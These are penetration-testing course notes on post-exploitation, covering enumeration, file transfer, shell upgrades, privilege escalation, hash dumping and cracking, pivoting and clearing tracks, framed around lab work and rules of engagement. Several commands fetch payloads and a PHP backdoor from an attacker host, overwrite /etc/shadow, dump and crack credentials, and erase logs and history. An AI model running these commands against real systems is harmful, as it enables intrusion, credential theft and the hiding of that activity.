2.5 Post-Exploitation

Post-Exploitation

⚡ Prerequisites

  • Basic familiarity with Linux & Windows

  • Basic understanding of TCP & UDP protocols

  • Basic familiarity with Metasploit and Exploitation

📕 Learning Objectives

  • Perform post exploitation

  • Perform Win/Linux local enumeration

  • Upgrade shells and elevate privileges

  • Establish persistence and dump account hashes

  • Pivot to other systems and clear tracks

🔬 Training list - PentesterAcademy/INE Labssubscription required

Post-Exploitation Introduction

🗒️ Post-Exploitation is the final phase of interaction with a target during a pentest. Using various attacking techniques, the pentester determines the value of the compromised system and keeps control of it for future usage, depending on the kind of access and the stealthiness he must have.It is what the pentester does after the initial foothold and the techniques depends on the target characteristics (operating system, infrastructure).

  • The techniques must follow the Rules of Engagement agreed upon with the client before the penetration test, based on the company infrastructure and services.

Necessary permissions are required to conduct post-exploitation techniques like modifying services, system configuration, logs deletion, perform privilege escalation.

Methodology

  1. Local Enumeration

  2. Transferring Files

  3. Upgrading Shells

  4. Privilege Escalation

  5. Persistence

  6. Dumping & Cracking Hashes

  7. Pivoting

  8. Clearing Tracks

The post-exploitation process repeats itself after pivoting to another new target.

🔬 The following techniques are covered in the

Windows Local Enumeration

📝📌 Checklist - Local Windows Privilege Escalation | HackTricks​🔬 Windows Post-Exploitation Lab

System Information

What is running on the target system?

  • Hostname

  • OS Name, Build, Service Pack, Architecture

  • Installed updates/Hotfixes

# MSF Meterpreter
getuid
sysinfo
show_mount
cat C:\\Windows\\System32\\eula.txt
getprivs
pgrep explorer.exe
migrate <PROCESS_ID>

# Win CMD - run 'shell' in Meterpreter
# System
hostname
systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn #enumerate a list of installed updates in addition to the HotFix URL.

Users & Groups

  • Current user, privileges & additional user information (user's psw policy, age, expiration)

  • Other users

  • Groups

  • Members of the built-in administrators group

F.e. if one user is in the admin group, we can try to exploit it to give admin permissions.

## Users
whoami
whoami /priv #to see our priviliges
query user #to check if user is logged and prevent detection
net users #display accounts of the system
net user <USER> #display info about account (psw age, expiration, logon hours allowed)
net localgroup #display list of system localgroups (administrators, Remote Desktop Users, Users)
net localgroup Administrators
net localgroup "Remote Desktop Users"

Network information & Services

  • IP address & network adapter

  • Internal networks and other hosts on the network

  • TCP/UDP services + ports

  • Routing table

  • Windows Firewall state

  • Running processes & services

  • Scheduled tasks

## Network
ipconfig
ipconfig /all
route print #display route table
arp -a #display arp table (it's important to see external devices to do pivoting)
netstat -ano #list of open connections and services running (protocol, process, ip/port source, ip/port destination, state, pid)
netsh firewall show state
netsh advfirewall show allprofiles

A process is an istance of a running program.A service is a process that runs in the background.

## Services
ps
net start
wmic service list brief
tasklist /SVC
schtasks /query /fo LIST
schtasks /query /fo LIST /v

Automating Local Enumeration

The Local Enumeration process can be automated with the help of scripts and Metasploit Framework modules.

  • Be time efficient

  • Additional enumeration & exploitation information

# Metasploit
use post/windows/gather/enum_logged_on_users
use post/windows/gather/win_privs
use post/windows/gather/enum_logged_on_users
use post/windows/gather/checkvm
use post/windows/gather/enum_applications
use post/windows/gather/enum_computers
use post/windows/gather/enum_patches
use post/windows/gather/enum_shares

Tools:

# JAWS - Automatic Local Enumeration - Powershell
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename Jaws-Enum.txt​

Linux Local Enumeration

📝📌 Checklist - Linux Privilege Escalation | HackTricks​🔬 Linux Post-Exploitation Lab

System Information

  • Hostname

  • Distribution & release version

  • Kernel version & Architecture

  • CPU information

  • Disk & mounted drives

  • Installed packages

# MSF Meterpreter
getuid #uid = 0 => root
sysinfo
ifconfig
netstat
route
arp
ps
pgrep vsftpd

# Linux SHELL - run 'shell' in Meterpreter
## System
/bin/bash -i
cd /root
hostname
cat /etc/*issue
cat /etc/*release
uname -a
dpkg -l

env
lscpu
free -h
df -h
lsblk | grep sd

Users & Groups

  • Current user & privileges

  • Other users

  • Groups

## Users
whoami
ls -lah /home
cat /etc/passwd #users and services accounts
cat /etc/passwd | grep -v /nologin #users accounts
cat /etc/passwd | grep -v /nologin | cut -d ":" -f 1 #users accounts (only names)
groups <USER>
groups root
groups
who
w
last
lastlog

Network information & Services

  • IP address & network adapter

  • Internal networks and other hosts on the network

  • TCP/UDP services + ports

  • Running services

  • Scheduled Cron Jobs

## Network
ifconfig
ip -br -c a
ip a
cat /etc/networks
cat /etc/hostname
cat /etc/hosts
cat /etc/resolv.conf
arp -a
netstat -a #shows all listening ports and established connections.
netstat -at or netstat -au #can also be used to list TCP or UDP protocols respectively.
netstat -l #list ports in “listening” mode. These ports are open and ready to accept
#incoming connections. This can be used with the “t” option to list only ports that
#are listening using the TCP protocol.
netstat -s #list network usage statistics by protocol. #This can also be used
#with the -t or -u options to limit the output to a specific protocol.
netstat -tp #list connections with the service name and PID information.
#This can also be used with the -l option to list listening ports.
netstat -i #shows interface statistics. We see below that “eth0” and “tun0” are more active than “tun1”.
netstat -ano #which could be broken down as follows: #-a: Display all sockets; n: Do not resolve names; o: Display timers

## Services
ps
ps aux
ps aux | grep msfconsole
ps aux | grep root
top
cat /etc/cron*
crontab -l

Find command

Searching the target system for important information and potential privilege escalation vectors can be fruitful. The built-in “find” command is useful and worth keeping in your arsenal.

Below are some useful examples for the “find” command.

Find files:

  • find . -name flag1.txt: find the file named “flag1.txt” in the current directory

  • find /home -name flag1.txt: find the file names “flag1.txt” in the /home directory

  • find / -type d -name config: find the directory named config under “/”

  • find / -type f -perm 0777: find files with the 777 permissions (files readable, writable, and executable by all users)

  • find / -perm a=x: find executable files

  • find /home -user frank: find all files for user “frank” under “/home”

  • find / -mtime 10: find files that were modified in the last 10 days

  • find / -atime 10: find files that were accessed in the last 10 day

  • find / -cmin -60: find files changed within the last hour (60 minutes)

  • find / -amin -60: find files accesses within the last hour (60 minutes)

  • find / -size 50M: find files with a 50 MB size

This command can also be used with (+) and (-) signs to specify a file that is larger or smaller than the given size.

The example above returns files that are larger than 100 MB. It is important to note that the “find” command tends to generate errors which sometimes makes the output hard to read. This is why it would be wise to use the “find” command with “-type f 2>/dev/null” to redirect errors to “/dev/null” and have a cleaner output.

Folders and files that can be written to or executed from:

  • find / -writable -type d 2>/dev/null : Find world-writeable folders

  • find / -perm -222 -type d 2>/dev/null: Find world-writeable folders

  • find / -perm -o w -type d 2>/dev/null: Find world-writeable folders

The reason we see three different “find” commands that could potentially lead to the same result can be seen in the manual document. As you can see below, the perm parameter affects the way “find” works.

  • find / -perm -o x -type d 2>/dev/null : Find world-executable folders

Find development tools and supported languages:

  • find / -name perl*

  • find / -name python*

  • find / -name gcc*

Find specific file permissions:

Below is a short example used to find files that have the SUID bit set. The SUID bit allows the file to run with the privilege level of the account that owns it, rather than the account which runs it.

This allows for an interesting privilege escalation path,we will see in more details on task 6.

The example below is given to complete the subject on the “find” command.

  • find / -perm -u=s -type f 2>/dev/null: Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current user.

Automating Local Enumeration

The Local Enumeration process can be automated with the help of scripts and Metasploit Framework modules. It is very useful to be time efficient.Tools:

# Metasploit
use post/linux/gather/enum_configs
use post/linux/gather/enum_network
use post/linux/gather/enum_system
use post/linux/gather/checkvm

# LINENUM - Automatic Enumeration
cd /tmp
upload LinEnum.sh
shell
/bin/bash -i
chmod +x LinEnum.sh
./LinEnum.sh

./LinEnum.sh -s -k <keyword> -r <report> -e /tmp/ -t

Transferring Files

Python modules can be useful for setting up a web server that hosts the files required for transfer. These modules

  • Check Python version

python -Vpython3 -Vpy -v # on Windows

# If Python version returned is 2.Xpython -m SimpleHTTPServer <PORT_NUMBER>

# If Python version is 3.Xpython3 -m http.server <PORT># On Windows, trypython -m http.server <PORT>py -3 -m http.server <PORT>e.g.

  • Copy a file into the current directory and setup the web server to download the file into the target system

cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .​# Python 2.7python -m SimpleHTTPServer 80​# Python 3.7python3 -m http.server 80

  • Files can be downloaded from a browser or using a GET request

Transferring Files

Windows

  • Set up a web server to host the payload.exe file

# Attacker machinecd /root/Desktop/ # payload.exe must be herepython3 -m http.server 80

  • After gaining access to the Windows target system and spawned a command shell session, download the payload file on the target system using the certutil tool in cmd.

# Windows Target machinecd C:\Tempcertutil -urlcache -f http://<ATTACKER-IP>/payload.exe payload.exe

Linux

  • After exploiting the Linux target, transfer the php-backdoor.php file to the target.

  • 2 terminal sessions are necessary - use tmux utility to get more sessions.

tmux - is a program, terminal multiplexer, which runs in a terminal and allows multiple other terminal programs to be run inside itsudo apt install tmux -y# Attacker machinetmux# ... Exploitation with MSFconsole in Terminal 0 ...# CTRL+B and then C to open a new terminal session​cd /usr/share/webshells/php/ip -br -c a192.219.50.2python3 -m http.server 80# CTRL+B then 0 (zero) to navigate to the first Terminal session# Target machine/bin/bash -iwget http://192.219.50.2/php-backdoor.phpwget http://<ATTACKER_IP>/php-backdoor.php

Interactive Shells

🔬 Interactive shells techniques are covered in an INE vulnerable Lab. Commands are below, assuming the target SAMBA service is already exploited through the exploit/linux/samba/is_known_pipename MSF module.

  • After the exploitation (using MSFconsole, netcat, etc), a non-interactive shell is obtained since it doesn't provide with a prompt

    • This is a command shell session

Non-interactive Shell

  • Display the list of shells on the target system

cat /etc/shells# /etc/shells: valid login shells/bin/sh/bin/dash/bin/bash/bin/rbash​/bin/bash -i​/bin/sh -i

Spawn TTY Shells

Bash

  • Upgrade to a simple bash or sh session (assuming bash is installed on the target system)

/bin/bash -i/bin/sh -iSHELL=/bin/bash script -q /dev/null​# Setup environment variablesexport PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binexport TERM=xtermexport SHELL=/bin/bash

Python

  • From the non-interactive shell session, check Python version (if present)

python --versionPython 2.7.9

  • Spawn a bash session with Python. Specified shell must be listed inside /etc/shells

python -c 'import pty; pty.spawn("/bin/bash")'Fully Interactive TTY

  • Background (CTRL+Z) the current remote shell

  • Update the local terminal line settings with stty and bring the remote shell back with fg

stty raw -echo && fg

  • Reinitialize the terminal with reset

reset

📌 For more information on Full TTY Shells check

Perl

perl -h

  • Spawn a bash session with Perl.

perl -e 'exec "/bin/bash";'

Windows Privilege Escalation

Privilege Escalation vulnerabilities can be identified by using various automation scripts and tools, based on the target system configuration.

  • PrivescCheck - a PowerShell script to enumerate common Windows configuration issues that can be leveraged for local privilege escalation

Running PrivescCheck.ps1 script from Powershell prompt

Commands: powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML,XML"

We can see result and check clear-text psw in the section winlogon.

Then, we can use psexec.py script to access by ssh:

 psexec.py username@IP #after this, write psw

And enumerate info using:

whoami
net user
whoami /priv

in alternative, we can use credentials using msf module:

exploit/windows/smb/psexec #using smb protocol

The foundamental is obtains win credential, after that, we can use: SMB, RDP and WinRM for Windows Authentication.

🔬 Check

Linux Privilege Escalation

Privesc vulnerabilities can be identified automatically using the LinEnum tool.

  • The below labs will focus on manual Linux Privilege Escalation techniques, instead

  • Linux file Permissions are important

🔬 Check

The following command will look for files (and not symlinks etc) which is world writable.

find / -not -type l -perm -o+w
find / -user root -perm -4000 -exec ls -ldb {} \; #or this

if we don't find nothing of anomaly, we can try to find misconfigured sudo. Check the current sudo capabilities.

sudo -l
(root) NOPASSWD: /usr/bin/man #user has root permissions for man app

The man entry depicts that the man command can be run using sudo without providing any password. Run it and launch /bin/bash from it.

sudo man ls
!/bin/bash

After this, escalated to root user is successful.

if file /etc/shadow is world writable, we can read its contents.

ls -l /etc/shadow
cat /etc/shadow

If root password isn't set. We can adding a known password in shadow file, one can escalate to root. Use openssl to generate a password entry.

openssl passwd -1 -salt abc password #setting new psw

Copy the generate entry and add it to root record in /etc/shadow Command:

vim /etc/shadow #copy psw and save it.
su #insert psw

Windows Persistence

🗒️ Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. - MITRE ATT&CK

Persistence techniques and methods usually require administrative access and must follow the rules of engagement agree with the customer.

Persistence Techniques - MITRE ATT&CK

🔬 Check the Windows Persistence Labs

Linux Persistence

Linux Server SSH service is typically enabled and an attacker can take advantage of it.

  • If password login is disabled and key-based authentication is enabled, the attacker can copy a user's SSH private key and use it for future access.

Linux Cron is a service that repeatedly runs Cron jobs that can be used for command execution at a fixed interval and ensure persistent access to the target system.

🔬 Check the Linux Persistence Labs

Dumping & Cracking Hashes

📝 Check the already covered Credential Dumping theory here:

After the dumping process, hashes can be cracked using:

The best thing to do in privilege escalation optical is migration of lsass process, because at difference between explorer.exe, it permits to upgrade sessions at 64 bit and access to lsass process cache.

After migration to lsass process, we can use utility as hashdump.

It will display a dump list of accounts and their hashes (usually NTLM hashes).

Of course, we can store it a file hashes.txt.

We can also load kiwi module, that's a module implementation of Mimikats for Meterpreter.

Now, using tools how John The Ripper, we can crack NTLM Hashes.

john --list=formats | grep NT
john --format=NT hashes.txt If we don't specify word list, John will use default word list, but we can use custom word list as rockyou.
gzip -d /usr/share/wordlists/rockyou.txt.gz
john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

​In alternative we can use hashcat.

hashcat --elp
hashcat -a 3 -m 1000 hashes.txt --wordlist /usr/share/wordlists/rockyou.txt #-a 3 (attack-mode brute-force), -m 1000 (NTLM)

When we gaining credentials, we can use psex python script, msf module or RDP (default port 3389) by xfreerdp.

xfreerdp /u:user /p:psw /v:IP

It's a very good method to access and maintaining legitimate persistence.

🔬 Check the Cracking Hashes Labs here

Pivoting

🗒️ Pivoting is a post exploitation technique of using a compromised host, a foothold / plant, to attack other systems on its private internal network.

  • Once gained access to the first target host, a forwarded port can be used to exploit other hosts on a private network unreachable from the attacker machine.

🗒️ Port Forwarding consists of rerouting/redirecting traffic from a target system's particular port to an attacker system's specific port.

  • The service will be remotely available to the attacker system

🔬 Check the Pivoting Lab here

Clearing Tracks

According to the rules of engagement, the pentester may be required to clear any changes that have been made to the target systems as a result of the exploitation and post-exploitation stages.A good practice is to store all artifacts payloads, scripts and binaries in these folders:

  • Windows - C:\Temp

  • Linux - /tmp

Metasploit Framework generates and stores a lot of artifacts on the target. Some modules provides removal resource scripts.

Windows

  • Delete the Windows Event Log can be a good post-exploitation clearing technique.

    • Avoid it during a regular Penetration Test, because data inside the Win Event Log is important to the customer.

Metasploit e.g.cd C:\\mkdir Tempcd Temp# Upload exploit into this C:\Temp directory

  • Use the Cleanup RC File

# Cleanup Meterpreter RC File:cat /root/.msf4/logs/persistence/ATTACKDEFENSE_20230429.0454/ATTACKDEFENSE_20230429.0454.rcbackgroundsessions 1resource /root/.msf4/logs/persistence/ATTACKDEFENSE_20230429.1019/ATTACKDEFENSE_20230429.1019.rc# Clear Windows Event Log from the Meterpreter session# An attacker could potentially do thisclearev

Linux

cd /tmp# Upload exploit into this /tmp directory

  • bash history logs the activity and the used commands

  • To clear the bash history

history -c

  • ~/.bash_history file content can be deleted too

cat /dev/null > ~/.bash_history

  • When using Metasploit Framework exploits, proceed manually to clear artifacts from the /tmp directory or other used directories.

Last updated